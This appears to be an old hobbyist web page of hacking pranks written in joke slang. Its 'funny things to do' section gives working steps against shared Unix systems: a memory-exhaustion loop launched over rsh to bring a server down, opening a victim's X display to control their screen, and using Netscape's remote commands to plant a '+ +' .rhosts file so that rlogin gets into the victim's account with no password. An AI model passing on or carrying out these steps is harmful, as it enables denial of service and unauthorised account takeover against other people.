[MIZ Kh] 


We left here a few stuff we either found on the net, or things we thought anybody should know...


A collection of stupid animated gifs :

 [Da BIL-GATZ] (We really love him }-)

[DA PIRATZ] or [DA SKULLZ]Allways look cool

[DA SHIP]Diz sheep iz so funny


A collection of stupid terms :

downpatching : This means to get something down form the net.

dumping : This can mean to get someone's account.

Stalling or "torching" : Taking the control over someone's computer,

and bringing it to his knees.

Intensive swarfing : Taking control over someone's display, and displaying

some strange stuff...

Oul oulding: This is a future technology, held by aliens and brought into light

by those to fuckin' FBI agents, but nobody really knows what it could be

used for...


Funny things to do :

Stalling (or torching) : Common UNIX systems (doesn't work on LINUX) have a

very studip system for managing the system resources. Any program can

thereby take control over the system :

Let us suppose U have access on a machine, lamz ,write a small program,

like this one : main() {while (1) malloc(200);}

and execute it in background with an rsh (rsh -n lamz progname)

Wait a few minutes (powerfull servers take only a few seconds ;-) and see...

Preparing attacks (UNIX) : Let us suppose U know a Deep-Ass, try to find a

good moment, to get on his keyboard. Just make his display accessible

(by a xhost +). The first step is to set Ur display to his, by a

setenv DISPLAY lamz:0 and then, try one of following :

Intensive swarfing : Now, U have gained control over his display,

thus U can either let things appear or disappear on his

screen... U can now call any program you want (like xv,

netscape or whatever else), it will appear on his screen.

To make windows disappear, use first xlsclients, that will

show U the actual windows, and their id. xlskill id will

destroy the window id.

Dumping : X-Windows has a very deep-hole ;-), in fact, U'll have seen

most of the Deep-Asses allways have a netscape opened. What

nobody knows, is that netscape (like any good UNIX software)

can take thousands of parameters... and they're cool !

First, create somewhere a file that only contains + +

Now, once U've gained someone's display (see above),

type these commands :

netscape -noraise -remote "openURL(http://full filename)"

netscape -noraise -remote "saveAs( full lamz path /.rhosts)"

netscape -noraise -back

Now, U can access his account with typing

(but it's forbidden ;-) rlogin anymachine -l lamz

U won't be asked for a password...

A good way to prevent this is to create Urself such a file

containing garbage (binary etc.)








This page is maintained by D-BIL